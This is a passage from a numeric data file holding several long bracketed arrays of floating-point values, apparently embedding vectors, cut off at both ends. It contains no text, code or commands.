92,0.054759704,-0.0019409164,0.01598393,0.015657075,-0.036940984,0.011578555,-0.045295406,-0.015188168,0.0044667814,0.011187825,-0.04822039,0.014484838,0.04630373,0.0053289593,-0.04396752,-0.0025246956,-0.011259747,-0.0037013663,-0.011882901,-0.08971365,0.06109675,-0.033102263,-0.039394047,0.03563566,0.008959586,0.048440374,-0.009992371,0.015703801,-0.028445434,0.036212277,-0.04653577,0.036747593,-0.044516306,0.009940472,-0.007763977,-0.026293358,-0.008082848,0.06046882,-0.045218777,-0.0023858892,0.006662755,0.03215922,0.050577868,-0.0017916395,-0.06278524,-0.0107269995,-0.010200223,0.004064252,0.0049730116,-0.043357488,-0.041486103,-0.044164836,-0.0022368294,-0.036999796,-0.012917938,0.001216782,0.0105758775,0.012529578,-0.014272568,0.048308905,0.027141653,0.035695154,-0.022465961,0.02159357,-0.011519986,-0.039956354,0.005797666,0.005298274,-0.030185305,0.011324565,-0.024338076,-0.0054467204,0.0034821397,0.029104652,0.0303609,-0.021395156,0.017559223,-0.043275792,0.031497523,-0.028893176,-0.039949212,0.014160807,0.012982178,0.010030041,0.025356727,0.015779018,0.059068017,-0.05860349,0.054598764,0.02224205,0.054018807,0.016306257,0.018348435,-0.033802535,0.030367117,-0.016176369,0.021443851,-0.045642287,-0.0724738,0.012549653,-0.02516547,0.042454362,-0.0262035,0.020272944,0.049134694,0.04343765,0.0007802446,-0.038001876,0.027927963,-0.056191985,0.006473914,0.002812691,-0.020351145,0.05827571,-0.003951317,0.016852101,-0.011405606,-0.032878373,0.039114054,-0.0072881817,0.033674523,-0.03385908,-0.03409358,0.03791107,0.0175031,0.014157318,-0.004125905,0.023126453,0.035461694,-0.012054621,0.02009475,-0.036158103,-0.005697492,0.03027385,-0.068521954,-0.035395913,0.05910554,0.049227912,-0.009345779,-0.0088018095,-0.007837153,-0.035341635,0.007986622,-0.017602999,0.025018003,0.023378279,0.015935004,-0.023417085,0.024517294,0.01786162,-0.017373478,0.011261219,-0.0075888433,0.018906558,0.04701447,0.013556838,-0.007585146,0.011705793,-0.0041177343,-0.043100707,-0.012295488,0.0062364596,-0.03309021,0.025403699,-0.11140577,0.033202145,-0.013014839,0.004877081,-0.0027751212,-0.028376933,0.034930456,0.03558828,-0.007900644,0.0067147496,0.010072246,-0.035777263,-0.0014677633,0.008008263,-0.025747497,-0.0401511,-0.05648304,0.009108397,0.03417094,-0.072940305,-0.008172595,0.03675856,0.007614549,0.11742955,-0.021268396,-0.03136376,0.027140839,-0.0073928996,-0.026405804,0.03884366,-0.02037798,-0.033252433,0.041444793,-0.00201949,0.0038279786,0.03577564,-0.034392867,-0.057370726,0.014276956,0.03629498,0.052410096,0.019223504,-0.029319454,-0.03227179,0.027784055,-0.0055470592,0.014328777,-0.019259984,-0.0021745032,0.037345055,0.066769965,0.04461686,-0.004427596,-0.03978924,0.05580613,-0.0026995952,0.021509167,0.010628588,0.028045187,0.009449066,0.014251654,0.01580836,0.004041997,0.034440517,0.015154886,-0.047852363,-0.060443893,-0.041347224,0.023546938,0.044465296,0.07780744,-0.023539366,-0.08578447,0.053972293,0.023275267,0.024810908,0.03518144,0.0030515636,0.107182644,0.0279949,0.004434036,-0.02771131,-0.010295939,0.01620891,0.025716059,0.0079289675,-0.021970157,-0.03053749,0.0118095055,-0.022669861,0.011347786,-0.037498742,0.038210317,0.035515383,-0.055639397,0.0074256305,-0.015584751,-0.06317198,-0.0052519105,0.023315039,-0.016359,-0.022220243,-0.0037549685,0.046215657,0.0110757565,-0.04142701,-0.01180393,-0.02164602,-0.058725372,0.051888,0.021679219,0.015412131,0.0066183363,-0.0060983556,0.0031217549,0.027838465,0.01130792,0.011809453,-0.022790441,-0.014730051,-0.01620021,0.026646411,0.031036712,0.021661531,0.04371285,0.070505194,-0.009118594,0.0013608328,0.017376263,-0.020721374,0.09128819,-0.053851474,-0.04964686,0.023322755,0.023502434,0.019867256,0.04249002,0.0024952877,0.017032536,-0.07404605,0.031541526,0.0051145516,-0.0035544217,0.013101111,0.009667768,-0.031039411,-0.051997304,-0.0021869943,-0.07199313,-0.011362731,0.04265931,-0.08926219,0.034027632,0.016074682,0.035646506,0.043493357,-0.07377197,-0.02132963,0.023943208,0.0013539625,-0.044315115,0.007551725,-0.007906372,0.03625265,0.026292246,0.018996073,-0.013113454,-0.04181145,0.01989765,0.022307638,-0.006377848,0.013077184,-0.03397133,-0.051099546,0.002918475,-0.04780263,0.044985224,-0.05016231,0.05279765,-0.022001293,0.008512227,-0.02521636,-0.06887863,-0.07459584,-0.048485473,0.018093163,0.0575807,0.025097692,-0.002238212,-0.022577634,-0.014601281,-0.015699916,0.01671926,0.011787067,0.029927889,-0.018888734,0.007048509,-0.014116609,0.016927833,0.004731755,0.04603337,-0.018527336,-0.04322426,-0.043596897,0.058115404,-0.02810215,0.016805775,0.012420604,-0.0019703235,-0.016547257,-0.0673722,0.034415044,-0.0027663321,-0.06786393,0.019213099,-0.0055840933,0.014142274,-0.0150177805,-0.047106355,-0.02606532,-0.01708249,-0.018618274,-0.020250611,-0.10236453,0.00779739,0.03316514,0.022536246,-0.01842183,0.02988625,0.054827403,0.00802068,0.028184388,-0.012457472,-0.009063996,0.02316125,0.04002017,-0.011131458,0.017840693,0.00868002,-0.04691687,0.05539602,-0.03524476,-0.017318772,-0.0156148765,0.010506855,-0.038218003,0.0841856,-0.021988623,0.072626956,-0.028714042,-0.040353633,-0.03417057,-0.039960966,0.028620968,-0.024263065,-0.00786857,-0.018885186,-0.0105724875,-0.11033542,-0.01380719,0.0059957914,0.042842485,-0.015681151,0.03962135,0.064751886,-0.013750541,-0.032876574,0.01784965,0.059130665,0.02005486,-0.03328491,0.07377369,0.056653094,-0.035121735,0.036682043,0.051500387,0.031624075,0.0037031297,-0.0052398304,-0.011022991,0.039729528,-0.006272653,-0.018267676,0.01580551,-0.0105574215,-0.01990461,-0.021345176,0.008772116,0.0024579712,-0.0126920575,0.004067275,-0.0026922936,0.017895896,-0.04483152,0.04835608,0.032776378,0.040020064,-0.04601552,0.008205033,0.00081001926,0.06843182,0.019942006,0.007093508,-0.021610426,0.02013628,0.023452727,0.034148887,-0.030868828,0.0012423901,-0.0087421145,0.03208623,-0.055164076,-0.016378466,-0.016283529,-0.032268833,-0.055741128,-0.047507983,-0.028785583,0.00048885983,-0.016562607,-0.03366631,0.002886097,-0.019812811,0.08069211,0.02425346,0.027079757,-0.002485181,0.03681803,0.0001796476,0.021769969,0.04726772,0.0144008985,0.039851446,-0.05294646,0.007279154,0.027445396,-0.019889921,0.03452819,-0.03176851,0.038010236,0.036314778,-0.041281052,0.035647172,-0.0014838504,0.038646515,0.019735957,-0.0057164407,-0.003451975,0.011991553,0.0031547495,0.026632773,-0.017420594,0.028831383,-0.0031406288,-0.06194888,-0.03207594,-0.023823572,0.07400502,0.023614926,0.06554806,-0.018567225,0.022651138,-0.053558014,0.01510451,-0.001592878,0.074293576,-0.02163338,-0.021103667,0.00924592,-0.04665037,-0.03381825,0.06868911,0.017219156,-0.0619011,0.010477161,-0.009691572,-0.0050824997,0.035029136,-0.0698906,-0.005732661,-0.0018027219,0.016093517,0.10655057,-0.00086940714,0.005304947,-0.05160632,0.039866153,0.01755833,-0.03910585,-0.04302015,-0.012996646,-0.06034576],[-0.011726709,0.06314325,-0.16348104,-0.085765295,0.068858154,-0.046543945,0.023282332,0.031562243,-0.052102923,-0.0025671439,-0.032583043,-0.0062891524,0.07970839,0.019350681,0.019914176,-0.009849564,-0.009864575,-0.073525466,-0.01817427,0.043403793,-0.008908777,-0.037156098,-0.013036881,-0.043972433,0.066299744,0.03172187,-0.03351494,-0.028736725,-0.044473704,-0.024864484,0.012537334,0.012604235,-0.03153622,0.005148963,-0.056176692,-0.064584956,0.03614155,0.021868818,-0.0032125753,-0.0066052116,0.06946023,0.014102343,0.00017137967,-0.018675389,0.000790371,0.012470483,0.02126356,-0.04931446,0.064655185,-0.0673042,0.020057837,0.010013914,0.011054843,0.03269922,0.039122097,0.068206236,-0.026075793,0.02379073,-0.033842564,-0.072925225,0.06638471,0.046444066,-0.08310693,0.07798674,0.013578159,-0.014671756,-0.042272378,0.042766184,0.02165487,-0.018848008,0.031269286,-0.0008095009,0.022202268,0.05044319,-0.02497218,-0.00049821136,-0.04031562,-0.021438966,-0.013681341,0.03549791,0.02582992,0.0020990272,0.11300414,-0.00996356,0.012120322,-0.044595253,-0.058862954,-0.02442778,-0.031600755,0.03765202,-0.018031968,0.013108014,-0.018646557,-0.013429668,-0.039950244,0.018576454,-0.012919109,0.03246189,-0.018327631,-0.0076279263,-0.059256837,-0.024828928,0.009340543,-0.00079645665,0.02008771,0.05528791,0.020513833,0.0027259497,-0.035561647,-0.014880307,-0.034372866,0.046213035,-0.03559572,0.02544009,-0.036563624,0.0077115865,0.03217652,-0.02996516,-0.054231793,0.042235006,0.023948845,-0.05435395,0.005040989,0.023817036,-0.012277368,0.033277433,-0.04866406,0.03130463,-0.032577306,-0.03450071,-0.0023112556,-0.009018515,-0.04169328,0.0062322286,0.020647824,0.060302947,-0.04004373,-0.03116239,0.02604552,0.0059888405,0.030635025,0.03030027,-0.046186157,-0.012145827,-0.0026805701,-0.07034388,-0.006525009,-0.035485514,-0.016434636,0.0068536606,0.036499783,0.023760343,0.002691105,-0.0020929924,0.026574608,-0.0025465505,-0.0048234467,-0.007386114,-0.01115704,0.060114168,0.03222856,-0.01689765,-0.04540704,0.057795145,0.023620417,-0.023246422,0.019759862,0.007074361,-0.0016165437,0.037125908,-0.074897945,-0.022203332,-0.0107781645,-0.029419467,0.0077380333,-0.028047975,0.05096205,-0.026407812,0.014220436,-0.02249382,0.0141483955,-0.045020092,0.031968873,0.018546125,-0.00485804,-0.016492765,-0.009474112,-0.039569262,0.05525848,-0.022541016,0.02914723,0.028400756,-0.06347215,-0.0111744385,-0.034824315,-0.045235742,0.017118838,-0.02959551,0.023732893,-0.037111774,-0.04284635,-0.027190408,-0.07216902,0.054374874,-0.03995964,0.0632504,-0.0037668117,0.053474355,-0.033264656,0.046572857,0.0788157,-0.014759587,0.022015674,0.006169339,0.009616545,-0.00005440085,0.011742896,-0.025299333,-0.014921262,0.0012280509,0.014399002,-0.003034698,-0.014235583,0.007663882,0.005569503,0.021089094,-0.03795827,-0.006375133,-0.04220938,-0.03442473,-0.02098112,-0.09496863,0.03820955,-0.020143347,0.021047374,0.052162744,-0.016171664,0.0332277,-0.006491521,0.071780115,-0.00248841,0.04516501,-0.033866707,-0.0063498905,-0.038622204,-0.014448672,0.018397443,-0.0016863069,0.003660568,0.05715444,0.0014555294,0.0030833522,0.01807467,0.019552544,0.03420617,-0.022558272,0.018110892,0.034754623,0.02313804,0.045051325,0.0477548,-0.042178057,-0.015361897,-0.042505156,-0.05919922,-0.041627638,-0.057268206,-0.0036168464,0.017320111,0.03271182,0.02098617,0.030791784,-0.015070409,0.030271973,-0.011059378,0.04573504,-0.01917116,0.0023120942,-0.034469757,0.0397497,-0.02116426,-0.030056883,-0.0039475756,-0.020554306,0.015400663,0.027367122,0.012780593,-0.0010265504,0.0059078108,-0.008546029,0.028422454,-0.039406046,-0.057738524,-0.011007859,-0.012485537,0.01788313,0.041328635,0.0005512109,0.012436287,-0.083421156,0.025374014,0.013790234,0.06300093,0.035822388,-0.01690143,0.009568276,-0.025503485,0.023105662,0.023686524,-0.03795683,-0.05536372,-0.05780358,-0.030975686,-0.017422246,0.016588919,-0.008258112,0.037947986,0.04289201,0.03244673,0.008530006,0.03899709,-0.041932546,0.015119522,-0.0507734,-0.023558611,0.07645652,-0.013804682,-0.00036401357,0.0065151216,0.024272753,0.03640466,0.037849408,0.024438689,-0.02499481,-0.009733325,0.040193565,0.04398383,-0.012224028,0.014401573,0.03807913,0.033275414,0.007854997,0.012006361,-0.025019811,-0.0085171545,-0.01213824,-0.016266175,-0.020565087,0.04573658,0.05475936,0.014115945,0.029251006,-0.018962938,-0.05550841,0.034028675,0.0046326043,0.031032013,0.08163904,0.008798873,-0.027996713,0.04539056,0.016581746,0.0248153,0.006166047,-0.006816255,0.027203184,0.031914618,-0.0012489529,-0.007990767,0.02161578,-0.0028215523,-0.07176267,-0.03345112,0.016911853,-0.045399338,-0.016479235,-0.09518759,-0.005552477,-0.012085727,0.019728327,-0.0058466713,-0.026285822,0.0085260365,0.0017293083,0.0017563798,0.008473643,0.0039912984,-0.036846455,0.0013012217,-0.013766816,0.014473717,-0.03780198,-0.026753223,0.003435482,0.018316697,-0.03485921,-0.0074520656,0.043589067,-0.04668943,0.06661995,-0.049990654,-0.04624003,0.05318002,0.024473362,-0.03705657,-0.0032048854,-0.036006935,-0.034324955,0.06233363,-0.00028444538,0.025897285,0.050369065,-0.012205872,-0.026366407,0.038087863,-0.013845083,0.024524909,-0.021866031,-0.02483897,-0.019507062,0.018575571,0.0034311514,0.05547989,0.005397874,0.052430496,0.025597202,0.03519067,0.022422882,-0.009309408,-0.015987154,0.07765697,-0.019457106,0.040665485,0.024857694,0.019115249,-0.0073085213,0.026635714,0.027470887,-0.0017283775,0.020908609,0.0139348935,-0.065923624,-0.050145015,-0.06791761,0.013670983,0.06707652,0.023707962,-0.024692802,-0.073391706,0.06268268,0.021635098,0.019256264,0.016611924,0.045534637,0.11156181,-0.029888093,0.01420735,-0.030236227,0.0092698075,0.030780088,-0.0037917008,0.03795918,-0.05358259,0.0078032995,0.03505614,-0.053696617,0.0013271151,-0.042731375,0.02965839,0.032591887,-0.04194531,0.0038264152,-0.010498959,-0.026025927,-0.02604728,0.030620363,-0.04242907,0.009464039,0.054005604,0.06791959,0.017577296,-0.040955115,-0.016611507,-0.022701288,-0.0018822507,0.05639205,-0.01835482,-0.053632934,-0.02117898,-0.0037760076,-0.0108185215,0.012788973,0.0568393,-0.007991319,-0.06014671,-0.018595142,-0.014455169,0.013371451,0.04343913,0.021140786,0.023744045,0.04839375,-0.0103531005,-0.015105546,0.022426257,-0.003274969,0.07227024,-0.03155487,-0.05648504,0.019252088,0.019060103,-0.0002830518,0.020382943,0.03083198,0.03561547,-0.04318733,0.008617665,0.03470446,-0.02905802,0.025965737,-0.0047450447,-0.042496093,-0.033580214,0.019450847,-0.0681346,0.016291488,0.043151632,-0.06276023,0.055511218,-0.00279845,0.031075789,0.03524171,-0.034385163,-0.010787952,0.01556663,-0.028199228,-0.029569698,0.014255869,0.039266896,0.07636031,0.03707021,0.032996282,0.02123394,-0.0023962816,0.0404413,-0.031452484,-0.0023590503,0.05066122,0.012180723,-0.11536386,0.012377563,-0.07922823,0.025331657,-0.027740024,-0.0047926265,-0.04771539,-0.00032089223,-0.03709828,-0.040972527,-0.07203878,-0.039839093,-0.009026556,0.06645142,0.057513393,-0.029912537,-0.041347697,-0.038475618,-0.0100011295,0.009530149,0.021105854,0.009359551,-0.0696116,-0.007880548,-0.01670543,0.016231634,-0.0016167145,0.04665509,0.044801656,-0.031498015,-0.078129314,0.023805475,-0.045533936,0.04408775,0.053364467,-0.013937044,-0.019599158,-0.08399196,-0.0033445447,-0.04189801,-0.04031845,-0.00032587623,-0.012100573,0.044748787,-0.025013823,0.01486481,0.029044602,0.02429535,-0.0046546953,-0.057690993,-0.087994054,-0.027176462,0.013182826,0.041390922,-0.05453937,0.027187042,0.083742924,-0.012413268,0.036993925,-0.0048747384,-0.014529316,0.046327997,0.041736666,-0.018096803,-0.0011927183,0.010731112,0.0014197965,0.05281205,0.023237282,0.039055824,-0.020748748,-0.011826935,-0.008093054,0.054327585,-0.05139638,0.009312753,-0.0071282047,-0.020234745,-0.013520098,-0.009478325,0.043771993,-0.059730656,-0.0030447775,-0.0018909117,-0.011566972,-0.07548335,0.005108653,-0.01446796,0.012563491,-0.013323578,0.046453513,0.062620446,-0.020937532,-0.0078382855,0.038742494,0.06310523,-0.020929359,0.021656238,0.0704619,0.05223339,-0.02460419,0.050485123,0.068260975,0.04490234,-0.016800096,-0.03766836,-0.020658271,0.019718252,-0.003815986,0.015823329,0.03826226,0.0433174,-0.043927897,0.007038171,-0.024311606,-0.007253683,-0.008388458,-0.0021196199,0.022579463,-0.02666239,-0.025320606,0.052814092,0.02878574,-0.00434235,-0.019917523,-0.004905981,0.019077966,0.02465975,0.011839303,-0.017981976,0.008950899,-0.038057975,0.023583623,0.035356183,-0.060854312,-0.017433638,-0.04335203,0.0141352,0.0008106662,-0.02406903,-0.015806068,-0.006328647,-0.034081843,-0.0012022334,-0.04609552,0.012095386,0.051593598,0.017881645,-0.035035245,-0.02081621,0.07903175,0.008080281,0.0144361025,-0.023691095,0.02881977,-0.020905478,0.00030592934,0.009163616,0.026013708,0.01647832,-0.055799656,-0.0058199703,0.013239251,-0.063118614,0.032371692,0.0057790168,0.016866416,-0.034471463,-0.026492225,-0.0060585043,0.0118435,0.012926957,-0.016688569,-0.071598895,0.0056636278,-0.0004487225,0.028539816,0.035967972,-0.05053214,-0.006802655,-0.0006461615,-0.004014747,-0.0382072,-0.04128645,0.07886846,0.016619453,0.022044294,-0.0136122005,0.0032803956,-0.037353445,-0.027333384,-0.034514792,0.010710087,-0.018444825,-0.034231763,0.019921532,-0.07156426,-0.028877648,0.08510964,-0.0055475133,-0.038271498,-0.015031497,-0.038682614,-0.00677597,-0.004797843,-0.027312651,0.01509983,0.04284074,0.034484375,0.13622314,0.022023518,0.009224909,-0.025921473,0.058917873,0.016279653,-0.06418499,0.008317607,-0.0057583796,-0.04494532],[-0.016264828,0.0861875,-0.16107272,-0.0850548,0.052028324,-0.04015519,0.01933556,0.023222826,-0.039808422,-0.017870367,-0.026549231,0.011199011,0.087578,-0.007873295,0.0135331275,-0.04161761,-0.004100226,-0.084286906,-0.048382632,0.047037516,-0.002315347,-0.036568098,-0.006931063,-0.052940562,0.06853505,0.06678981,-0.010169479,0.0065035773,-0.030123977,-0.028441105,0.06366246,-0.06928161,-0.0665174,0.018095493,-0.051992465,-0.025045091,0.0689061,0.0036669276,0.0034405799,0.003990214,0.06569008,0.02410368,-0.010125621,-0.001520261,-0.015071009,0.0153829,0.04735941,-0.018819066,0.09389212,-0.077113114,-0.00060302933,0.0144984955,-0.011510724,0.042327315,0.03749516,0.04333117,-0.013548597,-0.050815824,-0.010527525,-0.023092886,0.08828591,0.053574048,-0.080457084,0.056826375,0.022462051,-0.030577347,-0.041350465,0.036920447,0.038025968,-0.035911754,0.00418847,-0.030361246,-0.008712577,0.050914917,-0.059868187,-0.04794855,-0.008579548,-0.011257125,-0.017928297,0.054556906,0.018835193,0.005429762,0.07846984,0.011228972,0.0564944,-0.035300493,-0.06935403,0.011188693,-0.054781802,0.12241502,0.016388373,0.022317786,-0.011669391,0.0071480456,-0.04028532,0.024028128,0.011772155,0.035032574,-0.030247193,0.028002286,-0.031838194,-0.03155338,0.01594751,-0.014723143,0.024897588,0.05963859,-0.007010455,0.02073675,-0.025240349,0.010333634,-0.048239212,0.035406817,-0.02421017,-0.003939858,0.0057632825,-0.003597283,0.01616519,-0.017596144,-0.020255351,0.07811885,0.010118388,-0.063516885,-0.0046879305,0.050115105,-0.0078009893,-0.013317874,-0.045476567,0.01659886,0.009656998,-0.037850715,-0.0098839775,-0.013511173,-0.01805686,-0.020392114,0.025440278,0.098968595,-0.07412735,-0.0022977968,0.0018066147,0.02274069,0.014302286,0.0151336,0.011302426,-0.008780657,-0.009076362,-0.046534,0.010876165,-0.04444946,-0.042727463,-0.009490027,0.008766678,-0.01536473,0.0045631225,0.028532082,0.025470152,0.001732946,0.017420292,-0.0026004855,-0.0027671827,0.04460451,0.021253843,-0.00080111914,-0.009580359,0.046883725,0.018901834,-0.041790225,-0.0022907553,0.0081528,0.0010318952,0.055902597,-0.07803428,-0.03364878,0.01558201,-0.029770235,-0.0017841861,-0.038556073,0.0564827,-0.036418326,0.022293288,0.021693561,0.06208355,-0.06348543,0.035829797,0.020558018,-0.008757262,-0.029542033,-0.0072963405,-0.032796387,0.046284195,-0.009794468,0.020506537,-0.01870441,-0.03553668,-0.008906044,-0.055031765,-0.040080793,0.02341458,-0.04642273,-0.01386982,-0.004127619,-0.014345888,-0.0076748086,-0.040700335,-0.014093489,-0.020114722,0.0231944,-0.012244572,0.03554463,-0.034170043,0.039239462,0.06967116,-0.013858208,0.008954933,0.012285568,-0.00018383775,-0.0046651633,-0.0030072352,-0.028407328,-0.019246077,0.008312801,0.030401189,-0.019719103,-0.0011831766,-0.014995702,0.022144226,0.00072581077,-0.038752142,-0.003388589,-0.0042100037,-0.00597703,-0.023712035,-0.05664131,0.04552423,0.010570278,0.028018193,0.01762469,-0.019574352,0.052851494,-0.04139422,0.018931825,0.028415835,0.05824193,-0.009431289,-0.004640244,0.01158624,-0.020802652,0.03336715,-0.012417333,0.013692968,0.06740433,-0.011915587,-0.0005991067,0.035786007,0.04403422,0.030052423,-0.012625034,-0.019967668,-0.02081879,0.017055327,-0.0039072735,0.058675773,-0.02479248,0.005933576,-0.047673855,0.01680589,-0.0072045964,-0.03591291,-0.0013212775,0.017491052,0.025323968,0.03385495,0.044700127,0.0013203481,0.028780522,-0.012660193,0.03297488,-0.0041719233,-0.03293369,-0.04014179,0.022721926,-0.020816738,-0.01566496,-0.015626192,0.000013097364,-0.008169309,0.02003917,-0.027565213,-0.042705704,0.015713165,-0.0035461055,0.011423124,-0.031417046,-0.054021165,0.01912159,0.0019545534,0.034241114,0.029490236,-0.0015103013,0.00665107,-0.086775675,0.02897375,0.05263006,0.05691256,0.031492326,0.008262786,-0.03354919,0.004305391,-0.013663747,0.012366423,-0.02344468,-0.060959235,0.012930213,-0.014216327,0.01826075,-0.012002687,0.0045550065,0.05097806,0.03793209,0.020119555,-0.0031083152,0.043704618,-0.05302275,0.019096553,-0.05435744,-0.027658965,0.03083189,0.026863867,0.021453932,-0.011033177,-0.00046914024,0.03263303,0.017702278,0.031286124,-0.009050994,0.011294548,0.04897233,0.03434653,0.017035533,0.02818652,0.03617408,0.017777225,0.046506673,-0.0020338155,-0.016486779,0.014052885,-0.0095899245,-0.029734839,-0.023715215,0.06133097,0.032220155,-0.004332153,0.012252529,-0.00504429,-0.02252038,0.050794292,0.03317767,0.034863323,0.030589776,0.04751881,-0.048771795,0.057468034,-0.0316775,0.03981259,0.0034541455,-0.018332107,-0.0018493205,0.032004304,-0.0094172,0.0040123034,0.02310638,0.002345423,-0.027437178,-0.02718159,0.05155872,-0.025696665,-0.0041271243,-0.081756696,0.015227761,-0.003441416,-0.01034107,0.028853921,-0.009201317,-0.024482751,0.012976788,0.0070982184,-0.011443682,0.0063301623,-0.062746905,0.020706512,-0.029364293,-0.022926083,-0.000012875271,-0.03169694,-0.030915251,0.0013206707,-0.051412363,0.045188516,-0.022783304,0.00080100604,0.06723219,-0.034379534,-0.047309954,0.027774002,0.02336079,-0.024782017,0.009395982,-0.034512933,-0.014233117,0.055877857,-0.016476845,0.009137959,0.046050023,-0.024625335,-0.06987801,0.0074543897,-0.02894351,0.05153979,-0.0068298094,-0.020153271,-0.009875701,0.036164187,0.01820688,0.022986598,0.019125644,0.016990392,0.018029425,0.006845909,0.029243553,-0.00025361284,-0.010525335,0.05036348,0.008305553,0.027900737,0.015990779,-0.0072375084,-0.0060195266,0.01572856,0.050928026,0.023459084,-0.023734428,0.041904155,-0.060924266,-0.0476363,-0.04628818,0.032460134,0.05427399,0.048449002,-0.048697907,-0.06154717,0.072374396,0.02760872,0.010349607,0.022631744,0.012749704,0.106823824,-0.043936793,0.007450497,-0.025429748,0.039497364,0.05125285,-0.018862965,0.042383667,-0.045499045,0.039310604,0.019603975,-0.032488048,-0.020943271,-0.062227268,0.037402697,0.08825328,-0.06248241,-0.009372484,0.008006099,-0.061301503,-0.016132176,0.03810788,-0.048211124,0.010536577,-0.014508192,0.038045738,0.03831569,-0.06378196,-0.04329068,-0.046617705,-0.0056129084,0.07045736,0.0024220932,-0.04607332,0.0058972444,0.025652198,0.027471775,0.0047776727,0.024432061,0.013388932,-0.049463116,-0.063554674,-0.029561844,0.0006219426,0.09887423,0.040252473,0.03901162,0.033387784,-0.0326908,-0.025115024,0.035766903,-0.017250868,0.057976577,-0.03157299,-0.08404537,-0.004573191,-0.0009081153,0.0074191173,0.0029815927,-0.032257263,0.034246374,-0.020001099,0.048134077,0.02031299,-0.062702045,0.019154165,0.03209216,-0.042992532,0.0029587373,0.014114435,-0.04545937,0.015307217,0.050428525,-0.045498494,0.04555735,-0.041929796,0.021810561,0.017962353,-0.045760345,0.010888199,0.034435727,0.048276726,-0.006027886,0.0033803908,0.050623335,0.06276111,0.039649386,0.03587039,-0.006833302,-0.0008577679,-0.012129608,-0.012167099,-0.033763286,0.05204607,0.008011437,-0.08153657,0.048422527,-0.08195533,0.015005664,-0.046566702,-0.020405266,-0.029300781,0.002348719,-0.019333817,-0.021558547,-0.06063062,-0.048021354,-0.009932392,0.05551275,0.02364531,-0.02066646,-0.041374765,-0.0009796051,-0.041494656,-0.018662805,0.022358228,0.028323654,-0.04000927,-0.020474315,-0.03534495,-0.0036842346,-0.020564882,0.0113571,0.038838837,-0.052574005,-0.05468951,0.019583413,-0.019976052,0.009928804,0.02126204,-0.040852744,-0.00580592,-0.049744092,-0.04856677,-0.008814884,-0.0034273178,0.015383196,0.004657361,0.0120624695,-0.026842374,-0.00089522405,-0.0072501926,-0.0012899756,-0.02808268,-0.059707616,-0.06459783,0.0035228438,0.0041198223,0.068553664,-0.08637364,-0.0019065441,0.025863938,-0.013208937,0.04664858,-0.0013588613,-0.016699232,0.0063584186,0.0029918135,-0.0389972,0.01459262,0.037119906,-0.047040623,0.04347358,-0.009426429,-0.0048268326,-0.043279655,-0.011246801,-0.06728664,0.018401515,-0.051810984,-0.015183533,0.003895766,-0.016108071,-0.044800255,-0.029011685,0.018719954,-0.0619874,0.021540891,-0.02167453,-0.024740245,-0.08530111,0.0037816763,-0.044817924,0.034066323,-0.0020338017,0.03002673,0.021648934,-0.04186867,-0.025536984,0.02477338,0.054891083,-0.010907644,-0.0024341291,0.07779645,0.022546075,-0.04124789,0.079628296,0.09155491,0.0077941236,-0.0003258283,-0.02452465,0.0004895441,0.032038998,-0.072791636,-0.030118061,-0.033157878,-0.012662836,-0.038775817,-0.032812733,-0.004173051,0.020891873,-0.03074823,0.016528286,0.01430864,-0.019426357,-0.033265833,0.06217272,0.048331775,-0.015530884,-0.03859828,0.016869567,0.009235288,0.05289499,0.026170162,-0.026495207,-0.026851589,-0.01145098,0.013411285,0.04714598,-0.0432523,-0.0029932712,-0.053634442,-0.0066323737,-0.026951423,-0.012770688,-0.014463556,-0.0003840326,0.001669022,-0.011204733,-0.016802475,0.025379324,0.02285024,0.003552357,-0.054146167,-0.018546633,0.082474336,-0.025104132,0.042832814,-0.013869819,0.013091593,0.021808563,0.008238177,0.0381859,-0.004225708,-0.0014950314,-0.07254025,-0.0073749423,0.00194929,-0.03384077,0.044284284,0.08375142,0.06347608,-0.017658722,-0.008807164,-0.0033869366,0.024127921,0.011981271,-0.009195132,-0.05981115,0.00035135058,0.025247386,0.026897242,0.06212716,-0.03995785,-0.012328488,-0.0070338207,-0.021827677,-0.024835784,-0.04045524,0.06655211,0.019661807,0.0332318,0.022135122,-0.004893688,-0.059736833,-0.061138663,-0.015176445,0.040312972,-0.0024435536,-0.0090251705,-0.007004075,0.0053355047,-0.038033016,0.041101355,0.013595767,-0.060835514,0.051806767,-0.0030167322,0.015362209,-0.0027283486,-0.032679185,0.0050754086,0.038750634,0.041947186,0.09023144,0.029907713,0.032926828,-0.012574321,0.050608724,-0.014425977,-0.044806466,-0.017433427,0.0067698453,-0.03598377],[0.016680354,0.10252199,-0.18367489,-0.08383762,0.028491003,-0.028492445,-0.025031539,-0.024665954,-0.0056793853,-0.037742857,-0.03146796,0.0041905576,0.05109948,-0.029293895,0.040100854,-0.074194245,0.00070659,-0.018082507,-0.011863589,0.06579456,-0.014965144,-0.00019680947,-0.028425936,-0.08887064,0.08894339,0.06609121,-0.023573136,0.026400985,-0.03466196,-0.02831606,0.01767736,-0.04622144,-0.024133444,0.038562432,-0.05818194,-0.019602228,0.034456335,0.026140109,0.010923329,-0.0077551245,0.021504574,0.02463026,-0.00944538,-0.03177168,0.015514391,0.048712414,0.016541956,-0.0001550376,0.09011315,-0.07504197,0.016316798,0.012734061,0.012959415,0.04203082,0.012644821,0.041628882,-0.04603254,-0.030391263,0.0035359839,-0.03198717,0.0989114,0.05730245,-0.04209687,0.03623251,0.025652224,-0.011851845,0.012393222,0.050312657,0.025822466,-0.05348831,0.042954322,-0.0040114596,0.013813982,0.008110626,-0.053722426,-0.056798164,-0.009138464,0.0032261366,0.009660468,0.060131457,-0.0032962633,-0.0072430596,0.080323525,0.02707997,0.08115102,-0.04104003,-0.01232055,-0.0026959116,-0.0315669,0.075019464,0.032381713,-0.0072936816,0.013442843,0.0037389675,-0.06908659,0.011689463,0.0033050287,0.041108802,-0.041114323,-0.024488524,-0.051110037,0.0028258052,0.032111734,-0.020175636,0.0406214,0.029418746,-0.009111983,0.043210413,-0.04643754,0.0034786772,-0.039409835,0.01865373,-0.03179793,0.02249557,-0.010486607,-0.023470754,0.015200393,-0.009177469,-0.018731516,0.050568976,0.017903388,-0.034458697,0.008803355,0.04114237,-0.015542221,-0.027957425,-0.05241946,0.008140127,0.011829977,-0.029376648,0.01946204,-0.0033489903,-0.014535693,-0.03212267,-0.0008848498,0.066019185,-0.048000444,-0.01832217,-0.0054354905,0.004725957,0.021337323,-0.015277266,-0.0029936826,-0.005951864,0.0031212687,-0.056235917,0.03742233,-0.044874378,-0.06035834,-0.0014568781,0.050217334,0.015069275,-0.010160908,0.021649947,0.04258445,-0.022682058,0.028864458,-0.008258592,-0.027909003,0.013338184,0.0129210865,-0.0013262618,-0.0619307,0.05545517,-0.0018210278,-0.0455247,-0.012117114,0.05686176,-0